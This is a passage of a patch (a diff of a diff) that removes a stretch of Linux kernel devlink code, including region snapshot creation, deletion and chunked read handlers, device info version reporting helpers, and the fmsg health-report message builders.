+-	region_name = nla_data(info->attrs[DEVLINK_ATTR_REGION_NAME]);
+-	snapshot_id = nla_get_u32(info->attrs[DEVLINK_ATTR_REGION_SNAPSHOT_ID]);
+-
+-	if (info->attrs[DEVLINK_ATTR_PORT_INDEX]) {
+-		index = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_INDEX]);
+-
+-		port = devlink_port_get_by_index(devlink, index);
+-		if (!port)
+-			return -ENODEV;
+-	}
+-
+-	if (port)
+-		region = devlink_port_region_get_by_name(port, region_name);
+-	else
+-		region = devlink_region_get_by_name(devlink, region_name);
+-
+-	if (!region)
+-		return -EINVAL;
+-
+-	mutex_lock(&region->snapshot_lock);
+-	snapshot = devlink_region_snapshot_get_by_id(region, snapshot_id);
+-	if (!snapshot) {
+-		mutex_unlock(&region->snapshot_lock);
+-		return -EINVAL;
+-	}
+-
+-	devlink_region_snapshot_del(region, snapshot);
+-	mutex_unlock(&region->snapshot_lock);
+-	return 0;
+-}
+-
+-static int
+-devlink_nl_cmd_region_new(struct sk_buff *skb, struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_snapshot *snapshot;
+-	struct devlink_port *port = NULL;
+-	struct nlattr *snapshot_id_attr;
+-	struct devlink_region *region;
+-	const char *region_name;
+-	unsigned int index;
+-	u32 snapshot_id;
+-	u8 *data;
+-	int err;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_REGION_NAME)) {
+-		NL_SET_ERR_MSG_MOD(info->extack, "No region name provided");
+-		return -EINVAL;
+-	}
+-
+-	region_name = nla_data(info->attrs[DEVLINK_ATTR_REGION_NAME]);
+-
+-	if (info->attrs[DEVLINK_ATTR_PORT_INDEX]) {
+-		index = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_INDEX]);
+-
+-		port = devlink_port_get_by_index(devlink, index);
+-		if (!port)
+-			return -ENODEV;
+-	}
+-
+-	if (port)
+-		region = devlink_port_region_get_by_name(port, region_name);
+-	else
+-		region = devlink_region_get_by_name(devlink, region_name);
+-
+-	if (!region) {
+-		NL_SET_ERR_MSG_MOD(info->extack, "The requested region does not exist");
+-		return -EINVAL;
+-	}
+-
+-	if (!region->ops->snapshot) {
+-		NL_SET_ERR_MSG_MOD(info->extack, "The requested region does not support taking an immediate snapshot");
+-		return -EOPNOTSUPP;
+-	}
+-
+-	mutex_lock(&region->snapshot_lock);
+-
+-	if (region->cur_snapshots == region->max_snapshots) {
+-		NL_SET_ERR_MSG_MOD(info->extack, "The region has reached the maximum number of stored snapshots");
+-		err = -ENOSPC;
+-		goto unlock;
+-	}
+-
+-	snapshot_id_attr = info->attrs[DEVLINK_ATTR_REGION_SNAPSHOT_ID];
+-	if (snapshot_id_attr) {
+-		snapshot_id = nla_get_u32(snapshot_id_attr);
+-
+-		if (devlink_region_snapshot_get_by_id(region, snapshot_id)) {
+-			NL_SET_ERR_MSG_MOD(info->extack, "The requested snapshot id is already in use");
+-			err = -EEXIST;
+-			goto unlock;
+-		}
+-
+-		err = __devlink_snapshot_id_insert(devlink, snapshot_id);
+-		if (err)
+-			goto unlock;
+-	} else {
+-		err = __devlink_region_snapshot_id_get(devlink, &snapshot_id);
+-		if (err) {
+-			NL_SET_ERR_MSG_MOD(info->extack, "Failed to allocate a new snapshot id");
+-			goto unlock;
+-		}
+-	}
+-
+-	if (port)
+-		err = region->port_ops->snapshot(port, region->port_ops,
+-						 info->extack, &data);
+-	else
+-		err = region->ops->snapshot(devlink, region->ops,
+-					    info->extack, &data);
+-	if (err)
+-		goto err_snapshot_capture;
+-
+-	err = __devlink_region_snapshot_create(region, data, snapshot_id);
+-	if (err)
+-		goto err_snapshot_create;
+-
+-	if (!snapshot_id_attr) {
+-		struct sk_buff *msg;
+-
+-		snapshot = devlink_region_snapshot_get_by_id(region,
+-							     snapshot_id);
+-		if (WARN_ON(!snapshot)) {
+-			err = -EINVAL;
+-			goto unlock;
+-		}
+-
+-		msg = devlink_nl_region_notify_build(region, snapshot,
+-						     DEVLINK_CMD_REGION_NEW,
+-						     info->snd_portid,
+-						     info->snd_seq);
+-		err = PTR_ERR_OR_ZERO(msg);
+-		if (err)
+-			goto err_notify;
+-
+-		err = genlmsg_reply(msg, info);
+-		if (err)
+-			goto err_notify;
+-	}
+-
+-	mutex_unlock(&region->snapshot_lock);
+-	return 0;
+-
+-err_snapshot_create:
+-	region->ops->destructor(data);
+-err_snapshot_capture:
+-	__devlink_snapshot_id_decrement(devlink, snapshot_id);
+-	mutex_unlock(&region->snapshot_lock);
+-	return err;
+-
+-err_notify:
+-	devlink_region_snapshot_del(region, snapshot);
+-unlock:
+-	mutex_unlock(&region->snapshot_lock);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_region_read_chunk_fill(struct sk_buff *msg,
+-						 struct devlink *devlink,
+-						 u8 *chunk, u32 chunk_size,
+-						 u64 addr)
+-{
+-	struct nlattr *chunk_attr;
+-	int err;
+-
+-	chunk_attr = nla_nest_start_noflag(msg, DEVLINK_ATTR_REGION_CHUNK);
+-	if (!chunk_attr)
+-		return -EINVAL;
+-
+-	err = nla_put(msg, DEVLINK_ATTR_REGION_CHUNK_DATA, chunk_size, chunk);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	err = nla_put_u64_64bit(msg, DEVLINK_ATTR_REGION_CHUNK_ADDR, addr,
+-				DEVLINK_ATTR_PAD);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	nla_nest_end(msg, chunk_attr);
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(msg, chunk_attr);
+-	return err;
+-}
+-
+-#define DEVLINK_REGION_READ_CHUNK_SIZE 256
+-
+-static int devlink_nl_region_read_snapshot_fill(struct sk_buff *skb,
+-						struct devlink *devlink,
+-						struct devlink_region *region,
+-						struct nlattr **attrs,
+-						u64 start_offset,
+-						u64 end_offset,
+-						u64 *new_offset)
+-{
+-	struct devlink_snapshot *snapshot;
+-	u64 curr_offset = start_offset;
+-	u32 snapshot_id;
+-	int err = 0;
+-
+-	*new_offset = start_offset;
+-
+-	snapshot_id = nla_get_u32(attrs[DEVLINK_ATTR_REGION_SNAPSHOT_ID]);
+-	snapshot = devlink_region_snapshot_get_by_id(region, snapshot_id);
+-	if (!snapshot)
+-		return -EINVAL;
+-
+-	while (curr_offset < end_offset) {
+-		u32 data_size;
+-		u8 *data;
+-
+-		if (end_offset - curr_offset < DEVLINK_REGION_READ_CHUNK_SIZE)
+-			data_size = end_offset - curr_offset;
+-		else
+-			data_size = DEVLINK_REGION_READ_CHUNK_SIZE;
+-
+-		data = &snapshot->data[curr_offset];
+-		err = devlink_nl_cmd_region_read_chunk_fill(skb, devlink,
+-							    data, data_size,
+-							    curr_offset);
+-		if (err)
+-			break;
+-
+-		curr_offset += data_size;
+-	}
+-	*new_offset = curr_offset;
+-
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_region_read_dumpit(struct sk_buff *skb,
+-					     struct netlink_callback *cb)
+-{
+-	const struct genl_dumpit_info *info = genl_dumpit_info(cb);
+-	u64 ret_offset, start_offset, end_offset = U64_MAX;
+-	struct nlattr **attrs = info->attrs;
+-	struct devlink_port *port = NULL;
+-	struct devlink_region *region;
+-	struct nlattr *chunks_attr;
+-	const char *region_name;
+-	struct devlink *devlink;
+-	unsigned int index;
+-	void *hdr;
+-	int err;
+-
+-	start_offset = *((u64 *)&cb->args[0]);
+-
+-	devlink = devlink_get_from_attrs(sock_net(cb->skb->sk), attrs);
+-	if (IS_ERR(devlink))
+-		return PTR_ERR(devlink);
+-
+-	devl_lock(devlink);
+-
+-	if (!attrs[DEVLINK_ATTR_REGION_NAME] ||
+-	    !attrs[DEVLINK_ATTR_REGION_SNAPSHOT_ID]) {
+-		err = -EINVAL;
+-		goto out_unlock;
+-	}
+-
+-	if (info->attrs[DEVLINK_ATTR_PORT_INDEX]) {
+-		index = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_INDEX]);
+-
+-		port = devlink_port_get_by_index(devlink, index);
+-		if (!port) {
+-			err = -ENODEV;
+-			goto out_unlock;
+-		}
+-	}
+-
+-	region_name = nla_data(attrs[DEVLINK_ATTR_REGION_NAME]);
+-
+-	if (port)
+-		region = devlink_port_region_get_by_name(port, region_name);
+-	else
+-		region = devlink_region_get_by_name(devlink, region_name);
+-
+-	if (!region) {
+-		err = -EINVAL;
+-		goto out_unlock;
+-	}
+-
+-	if (attrs[DEVLINK_ATTR_REGION_CHUNK_ADDR] &&
+-	    attrs[DEVLINK_ATTR_REGION_CHUNK_LEN]) {
+-		if (!start_offset)
+-			start_offset =
+-				nla_get_u64(attrs[DEVLINK_ATTR_REGION_CHUNK_ADDR]);
+-
+-		end_offset = nla_get_u64(attrs[DEVLINK_ATTR_REGION_CHUNK_ADDR]);
+-		end_offset += nla_get_u64(attrs[DEVLINK_ATTR_REGION_CHUNK_LEN]);
+-	}
+-
+-	if (end_offset > region->size)
+-		end_offset = region->size;
+-
+-	/* return 0 if there is no further data to read */
+-	if (start_offset == end_offset) {
+-		err = 0;
+-		goto out_unlock;
+-	}
+-
+-	hdr = genlmsg_put(skb, NETLINK_CB(cb->skb).portid, cb->nlh->nlmsg_seq,
+-			  &devlink_nl_family, NLM_F_ACK | NLM_F_MULTI,
+-			  DEVLINK_CMD_REGION_READ);
+-	if (!hdr) {
+-		err = -EMSGSIZE;
+-		goto out_unlock;
+-	}
+-
+-	err = devlink_nl_put_handle(skb, devlink);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	if (region->port) {
+-		err = nla_put_u32(skb, DEVLINK_ATTR_PORT_INDEX,
+-				  region->port->index);
+-		if (err)
+-			goto nla_put_failure;
+-	}
+-
+-	err = nla_put_string(skb, DEVLINK_ATTR_REGION_NAME, region_name);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	chunks_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_REGION_CHUNKS);
+-	if (!chunks_attr) {
+-		err = -EMSGSIZE;
+-		goto nla_put_failure;
+-	}
+-
+-	err = devlink_nl_region_read_snapshot_fill(skb, devlink,
+-						   region, attrs,
+-						   start_offset,
+-						   end_offset, &ret_offset);
+-
+-	if (err && err != -EMSGSIZE)
+-		goto nla_put_failure;
+-
+-	/* Check if there was any progress done to prevent infinite loop */
+-	if (ret_offset == start_offset) {
+-		err = -EINVAL;
+-		goto nla_put_failure;
+-	}
+-
+-	*((u64 *)&cb->args[0]) = ret_offset;
+-
+-	nla_nest_end(skb, chunks_attr);
+-	genlmsg_end(skb, hdr);
+-	devl_unlock(devlink);
+-	devlink_put(devlink);
+-	return skb->len;
+-
+-nla_put_failure:
+-	genlmsg_cancel(skb, hdr);
+-out_unlock:
+-	devl_unlock(devlink);
+-	devlink_put(devlink);
+-	return err;
+-}
+-
+-int devlink_info_driver_name_put(struct devlink_info_req *req, const char *name)
+-{
+-	if (!req->msg)
+-		return 0;
+-	return nla_put_string(req->msg, DEVLINK_ATTR_INFO_DRIVER_NAME, name);
+-}
+-EXPORT_SYMBOL_GPL(devlink_info_driver_name_put);
+-
+-int devlink_info_serial_number_put(struct devlink_info_req *req, const char *sn)
+-{
+-	if (!req->msg)
+-		return 0;
+-	return nla_put_string(req->msg, DEVLINK_ATTR_INFO_SERIAL_NUMBER, sn);
+-}
+-EXPORT_SYMBOL_GPL(devlink_info_serial_number_put);
+-
+-int devlink_info_board_serial_number_put(struct devlink_info_req *req,
+-					 const char *bsn)
+-{
+-	if (!req->msg)
+-		return 0;
+-	return nla_put_string(req->msg, DEVLINK_ATTR_INFO_BOARD_SERIAL_NUMBER,
+-			      bsn);
+-}
+-EXPORT_SYMBOL_GPL(devlink_info_board_serial_number_put);
+-
+-static int devlink_info_version_put(struct devlink_info_req *req, int attr,
+-				    const char *version_name,
+-				    const char *version_value,
+-				    enum devlink_info_version_type version_type)
+-{
+-	struct nlattr *nest;
+-	int err;
+-
+-	if (req->version_cb)
+-		req->version_cb(version_name, version_type,
+-				req->version_cb_priv);
+-
+-	if (!req->msg)
+-		return 0;
+-
+-	nest = nla_nest_start_noflag(req->msg, attr);
+-	if (!nest)
+-		return -EMSGSIZE;
+-
+-	err = nla_put_string(req->msg, DEVLINK_ATTR_INFO_VERSION_NAME,
+-			     version_name);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	err = nla_put_string(req->msg, DEVLINK_ATTR_INFO_VERSION_VALUE,
+-			     version_value);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	nla_nest_end(req->msg, nest);
+-
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(req->msg, nest);
+-	return err;
+-}
+-
+-int devlink_info_version_fixed_put(struct devlink_info_req *req,
+-				   const char *version_name,
+-				   const char *version_value)
+-{
+-	return devlink_info_version_put(req, DEVLINK_ATTR_INFO_VERSION_FIXED,
+-					version_name, version_value,
+-					DEVLINK_INFO_VERSION_TYPE_NONE);
+-}
+-EXPORT_SYMBOL_GPL(devlink_info_version_fixed_put);
+-
+-int devlink_info_version_stored_put(struct devlink_info_req *req,
+-				    const char *version_name,
+-				    const char *version_value)
+-{
+-	return devlink_info_version_put(req, DEVLINK_ATTR_INFO_VERSION_STORED,
+-					version_name, version_value,
+-					DEVLINK_INFO_VERSION_TYPE_NONE);
+-}
+-EXPORT_SYMBOL_GPL(devlink_info_version_stored_put);
+-
+-int devlink_info_version_stored_put_ext(struct devlink_info_req *req,
+-					const char *version_name,
+-					const char *version_value,
+-					enum devlink_info_version_type version_type)
+-{
+-	return devlink_info_version_put(req, DEVLINK_ATTR_INFO_VERSION_STORED,
+-					version_name, version_value,
+-					version_type);
+-}
+-EXPORT_SYMBOL_GPL(devlink_info_version_stored_put_ext);
+-
+-int devlink_info_version_running_put(struct devlink_info_req *req,
+-				     const char *version_name,
+-				     const char *version_value)
+-{
+-	return devlink_info_version_put(req, DEVLINK_ATTR_INFO_VERSION_RUNNING,
+-					version_name, version_value,
+-					DEVLINK_INFO_VERSION_TYPE_NONE);
+-}
+-EXPORT_SYMBOL_GPL(devlink_info_version_running_put);
+-
+-int devlink_info_version_running_put_ext(struct devlink_info_req *req,
+-					 const char *version_name,
+-					 const char *version_value,
+-					 enum devlink_info_version_type version_type)
+-{
+-	return devlink_info_version_put(req, DEVLINK_ATTR_INFO_VERSION_RUNNING,
+-					version_name, version_value,
+-					version_type);
+-}
+-EXPORT_SYMBOL_GPL(devlink_info_version_running_put_ext);
+-
+-static int
+-devlink_nl_info_fill(struct sk_buff *msg, struct devlink *devlink,
+-		     enum devlink_command cmd, u32 portid,
+-		     u32 seq, int flags, struct netlink_ext_ack *extack)
+-{
+-	struct devlink_info_req req = {};
+-	void *hdr;
+-	int err;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	err = -EMSGSIZE;
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto err_cancel_msg;
+-
+-	req.msg = msg;
+-	err = devlink->ops->info_get(devlink, &req, extack);
+-	if (err)
+-		goto err_cancel_msg;
+-
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-err_cancel_msg:
+-	genlmsg_cancel(msg, hdr);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_info_get_doit(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct sk_buff *msg;
+-	int err;
+-
+-	if (!devlink->ops->info_get)
+-		return -EOPNOTSUPP;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_info_fill(msg, devlink, DEVLINK_CMD_INFO_GET,
+-				   info->snd_portid, info->snd_seq, 0,
+-				   info->extack);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return err;
+-	}
+-
+-	return genlmsg_reply(msg, info);
+-}
+-
+-static int devlink_nl_cmd_info_get_dumpit(struct sk_buff *msg,
+-					  struct netlink_callback *cb)
+-{
+-	struct devlink *devlink;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err = 0;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		if (idx < start || !devlink->ops->info_get)
+-			goto inc;
+-
+-		devl_lock(devlink);
+-		err = devlink_nl_info_fill(msg, devlink, DEVLINK_CMD_INFO_GET,
+-					   NETLINK_CB(cb->skb).portid,
+-					   cb->nlh->nlmsg_seq, NLM_F_MULTI,
+-					   cb->extack);
+-		devl_unlock(devlink);
+-		if (err == -EOPNOTSUPP)
+-			err = 0;
+-		else if (err) {
+-			devlink_put(devlink);
+-			break;
+-		}
+-inc:
+-		idx++;
+-		devlink_put(devlink);
+-	}
+-
+-	if (err != -EMSGSIZE)
+-		return err;
+-
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-struct devlink_fmsg_item {
+-	struct list_head list;
+-	int attrtype;
+-	u8 nla_type;
+-	u16 len;
+-	int value[];
+-};
+-
+-struct devlink_fmsg {
+-	struct list_head item_list;
+-	bool putting_binary; /* This flag forces enclosing of binary data
+-			      * in an array brackets. It forces using
+-			      * of designated API:
+-			      * devlink_fmsg_binary_pair_nest_start()
+-			      * devlink_fmsg_binary_pair_nest_end()
+-			      */
+-};
+-
+-static struct devlink_fmsg *devlink_fmsg_alloc(void)
+-{
+-	struct devlink_fmsg *fmsg;
+-
+-	fmsg = kzalloc(sizeof(*fmsg), GFP_KERNEL);
+-	if (!fmsg)
+-		return NULL;
+-
+-	INIT_LIST_HEAD(&fmsg->item_list);
+-
+-	return fmsg;
+-}
+-
+-static void devlink_fmsg_free(struct devlink_fmsg *fmsg)
+-{
+-	struct devlink_fmsg_item *item, *tmp;
+-
+-	list_for_each_entry_safe(item, tmp, &fmsg->item_list, list) {
+-		list_del(&item->list);
+-		kfree(item);
+-	}
+-	kfree(fmsg);
+-}
+-
+-static int devlink_fmsg_nest_common(struct devlink_fmsg *fmsg,
+-				    int attrtype)
+-{
+-	struct devlink_fmsg_item *item;
+-
+-	item = kzalloc(sizeof(*item), GFP_KERNEL);
+-	if (!item)
+-		return -ENOMEM;
+-
+-	item->attrtype = attrtype;
+-	list_add_tail(&item->list, &fmsg->item_list);
+-
+-	return 0;
+-}
+-
+-int devlink_fmsg_obj_nest_start(struct devlink_fmsg *fmsg)
+-{
+-	if (fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	return devlink_fmsg_nest_common(fmsg, DEVLINK_ATTR_FMSG_OBJ_NEST_START);
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_obj_nest_start);
+-
+-static int devlink_fmsg_nest_end(struct devlink_fmsg *fmsg)
+-{
+-	if (fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	return devlink_fmsg_nest_common(fmsg, DEVLINK_ATTR_FMSG_NEST_END);
+-}
+-
+-int devlink_fmsg_obj_nest_end(struct devlink_fmsg *fmsg)
+-{
+-	if (fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	return devlink_fmsg_nest_end(fmsg);
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_obj_nest_end);
+-
+-#define DEVLINK_FMSG_MAX_SIZE (GENLMSG_DEFAULT_SIZE - GENL_HDRLEN - NLA_HDRLEN)
+-
+-static int devlink_fmsg_put_name(struct devlink_fmsg *fmsg, const char *name)
+-{
+-	struct devlink_fmsg_item *item;
+-
+-	if (fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	if (strlen(name) + 1 > DEVLINK_FMSG_MAX_SIZE)
+-		return -EMSGSIZE;
+-
+-	item = kzalloc(sizeof(*item) + strlen(name) + 1, GFP_KERNEL);
+-	if (!item)
+-		return -ENOMEM;
+-
+-	item->nla_type = NLA_NUL_STRING;
+-	item->len = strlen(name) + 1;
+-	item->attrtype = DEVLINK_ATTR_FMSG_OBJ_NAME;
+-	memcpy(&item->value, name, item->len);
+-	list_add_tail(&item->list, &fmsg->item_list);
+-
+-	return 0;
+-}
+-
+-int devlink_fmsg_pair_nest_start(struct devlink_fmsg *fmsg, const char *name)
+-{
+-	int err;
+-
+-	if (fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	err = devlink_fmsg_nest_common(fmsg, DEVLINK_ATTR_FMSG_PAIR_NEST_START);
+-	if (err)
+-		return err;
+-
+-	err = devlink_fmsg_put_name(fmsg, name);
+-	if (err)
+-		return err;
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_pair_nest_start);
+-
+-int devlink_fmsg_pair_nest_end(struct devlink_fmsg *fmsg)
+-{
+-	if (fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	return devlink_fmsg_nest_end(fmsg);
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_pair_nest_end);
+-
+-int devlink_fmsg_arr_pair_nest_start(struct devlink_fmsg *fmsg,
+-				     const char *name)
+-{
+-	int err;
+-
+-	if (fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	err = devlink_fmsg_pair_nest_start(fmsg, name);
+-	if (err)
+-		return err;
+-
+-	err = devlink_fmsg_nest_common(fmsg, DEVLINK_ATTR_FMSG_ARR_NEST_START);
+-	if (err)
+-		return err;
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_arr_pair_nest_start);
+-
+-int devlink_fmsg_arr_pair_nest_end(struct devlink_fmsg *fmsg)
+-{
+-	int err;
+-
+-	if (fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	err = devlink_fmsg_nest_end(fmsg);
+-	if (err)
+-		return err;
+-
+-	err = devlink_fmsg_nest_end(fmsg);
+-	if (err)
+-		return err;
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_arr_pair_nest_end);
+-
+-int devlink_fmsg_binary_pair_nest_start(struct devlink_fmsg *fmsg,
+-					const char *name)
+-{
+-	int err;
+-
+-	err = devlink_fmsg_arr_pair_nest_start(fmsg, name);
+-	if (err)
+-		return err;
+-
+-	fmsg->putting_binary = true;
+-	return err;
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_binary_pair_nest_start);
+-
+-int devlink_fmsg_binary_pair_nest_end(struct devlink_fmsg *fmsg)
+-{
+-	if (!fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	fmsg->putting_binary = false;
+-	return devlink_fmsg_arr_pair_nest_end(fmsg);
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_binary_pair_nest_end);
+-
+-static int devlink_fmsg_put_value(struct devlink_fmsg *fmsg,
+-				  const void *value, u16 value_len,
+-				  u8 value_nla_type)
+-{
+-	struct devlink_fmsg_item *item;
+-
+-	if (value_len > DEVLINK_FMSG_MAX_SIZE)
+-		return -EMSGSIZE;
+-
+-	item = kzalloc(sizeof(*item) + value_len, GFP_KERNEL);
+-	if (!item)
+-		return -ENOMEM;
+-
+-	item->nla_type = value_nla_type;
+-	item->len = value_len;
+-	item->attrtype = DEVLINK_ATTR_FMSG_OBJ_VALUE_DATA;
+-	memcpy(&item->value, value, item->len);
+-	list_add_tail(&item->list, &fmsg->item_list);
+-
+-	return 0;
+-}
+-
+-static int devlink_fmsg_bool_put(struct devlink_fmsg *fmsg, bool value)
+-{
+-	if (fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	return devlink_fmsg_put_value(fmsg, &value, sizeof(value), NLA_FLAG);
+-}
+-
+-static int devlink_fmsg_u8_put(struct devlink_fmsg *fmsg, u8 value)
+-{
+-	if (fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	return devlink_fmsg_put_value(fmsg, &value, sizeof(value), NLA_U8);
+-}
+-
+-int devlink_fmsg_u32_put(struct devlink_fmsg *fmsg, u32 value)
+-{
+-	if (fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	return devlink_fmsg_put_value(fmsg, &value, sizeof(value), NLA_U32);
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_u32_put);
+-
+-static int devlink_fmsg_u64_put(struct devlink_fmsg *fmsg, u64 value)
+-{
+-	if (fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	return devlink_fmsg_put_value(fmsg, &value, sizeof(value), NLA_U64);
+-}
+-
+-int devlink_fmsg_string_put(struct devlink_fmsg *fmsg, const char *value)
+-{
+-	if (fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	return devlink_fmsg_put_value(fmsg, value, strlen(value) + 1,
+-				      NLA_NUL_STRING);
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_string_put);
+-
+-int devlink_fmsg_binary_put(struct devlink_fmsg *fmsg, const void *value,
+-			    u16 value_len)
+-{
+-	if (!fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	return devlink_fmsg_put_value(fmsg, value, value_len, NLA_BINARY);
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_binary_put);
+-
+-int devlink_fmsg_bool_pair_put(struct devlink_fmsg *fmsg, const char *name,
+-			       bool value)
+-{
+-	int err;
+-
+-	err = devlink_fmsg_pair_nest_start(fmsg, name);
+-	if (err)
+-		return err;
+-
+-	err = devlink_fmsg_bool_put(fmsg, value);
+-	if (err)
+-		return err;
+-
+-	err = devlink_fmsg_pair_nest_end(fmsg);
+-	if (err)
+-		return err;
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_bool_pair_put);
+-
+-int devlink_fmsg_u8_pair_put(struct devlink_fmsg *fmsg, const char *name,
+-			     u8 value)
+-{
+-	int err;
+-
+-	err = devlink_fmsg_pair_nest_start(fmsg, name);
+-	if (err)
+-		return err;
+-
+-	err = devlink_fmsg_u8_put(fmsg, value);
+-	if (err)
+-		return err;
+-
+-	err = devlink_fmsg_pair_nest_end(fmsg);
+-	if (err)
+-		return err;
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_u8_pair_put);
+-
+-int devlink_fmsg_u32_pair_put(struct devlink_fmsg *fmsg, const char *name,
+-			      u32 value)
+-{
+-	int err;
+-
+-	err = devlink_fmsg_pair_nest_start(fmsg, name);
+-	if (err)
+-		return err;
+-
+-	err = devlink_fmsg_u32_put(fmsg, value);
+-	if (err)
+-		return err;
+-
+-	err = devlink_fmsg_pair_nest_end(fmsg);
+-	if (err)
+-		return err;
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_u32_pair_put);
+-
+-int devlink_fmsg_u64_pair_put(struct devlink_fmsg *fmsg, const char *name,
+-			      u64 value)
+-{
+-	int err;
+-
+-	err = devlink_fmsg_pair_nest_start(fmsg, name);
+-	if (err)
+-		return err;
+-
+-	err = devlink_fmsg_u64_put(fmsg, value);
+-	if (err)
+-		return err;
+-
+-	err = devlink_fmsg_pair_nest_end(fmsg);
+-	if (err)
+-		return err;
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_u64_pair_put);
+-
+-int devlink_fmsg_string_pair_put(struct devlink_fmsg *fmsg, const char *name,
+-				 const char *value)
+-{
+-	int err;
+-
+-	err = devlink_fmsg_pair_nest_start(fmsg, name);
+-	if (err)
+-		return err;
+-
+-	err = devlink_fmsg_string_put(fmsg, value);
+-	if (err)
+-		return err;
+-
+-	err = devlink_fmsg_pair_nest_end(fmsg);
+-	if (err)
+-		return err;
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_string_pair_put);
+-
+-int devlink_fmsg_binary_pair_put(struct devlink_fmsg *fmsg, const char *name,
+-				 const void *value, u32 value_len)
+-{
+-	u32 data_size;
+-	int end_err;
+-	u32 offset;
+-	int err;
+-
+-	err = devlink_fmsg_binary_pair_nest_start(fmsg, name);
+-	if (err)
+-		return err;
+-
+-	for (offset = 0; offset < value_len; offset += data_size) {
+-		data_size = value_len - offset;
+-		if (data_size > DEVLINK_FMSG_MAX_SIZE)
+-			data_size = DEVLINK_FMSG_MAX_SIZE;
+-		err = devlink_fmsg_binary_put(fmsg, value + offset, data_size);
+-		if (err)
+-			break;
+-		/* Exit from loop with a break (instead of
+-		 * return) to make sure putting_binary is turned off in
+-		 * devlink_fmsg_binary_pair_nest_end
+-		 */
+-	}
+-
+-	end_err = devlink_fmsg_binary_pair_nest_end(fmsg);
+-	if (end_err)
+-		err = end_err;
+-
+-	return err;
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_binary_pair_put);
+-
+-static int
+-devlink_fmsg_item_fill_type(struct devlink_fmsg_item *msg, struct sk_buff *skb)
+-{
+-	switch (msg->nla_type) {
+-	case NLA_FLAG:
+-	case NLA_U8:
+-	case NLA_U32:
+-	case NLA_U64:
+-	case NLA_NUL_STRING:
+-	case NLA_BINARY:
+-		return nla_put_u8(skb, DEVLINK_ATTR_FMSG_OBJ_VALUE_TYPE,
+-				  msg->nla_type);
+-	default:
+-		return -EINVAL;
+-	}
+-}
+-
+-static int
+-devlink_fmsg_item_fill_data(struct devlink_fmsg_item *msg, struct sk_buff *skb)
+-{
+-	int attrtype = DEVLINK_ATTR_FMSG_OBJ_VALUE_DATA;
+-	u8 tmp;
+-
+-	switch (msg->nla_type) {
+-	case NLA_FLAG:
+-		/* Always provide flag data, regardless of its value */
+-		tmp = *(bool *) msg->value;
+-
+-		return nla_put_u8(skb, attrtype, tmp);
+-	case NLA_U8:
+-		return nla_put_u8(skb, attrtype, *(u8 *) msg->value);
+-	case NLA_U32:
+-		return nla_put_u32(skb, attrtype, *(u32 *) msg->value);
+-	case NLA_U64:
+-		return nla_put_u64_64bit(skb, attrtype, *(u64 *) msg->value,
+-					 DEVLINK_ATTR_PAD);
+-	case NLA_NUL_STRING:
+-		return nla_put_string(skb, attrtype, (char *) &msg->value);
+-	case NLA_BINARY:
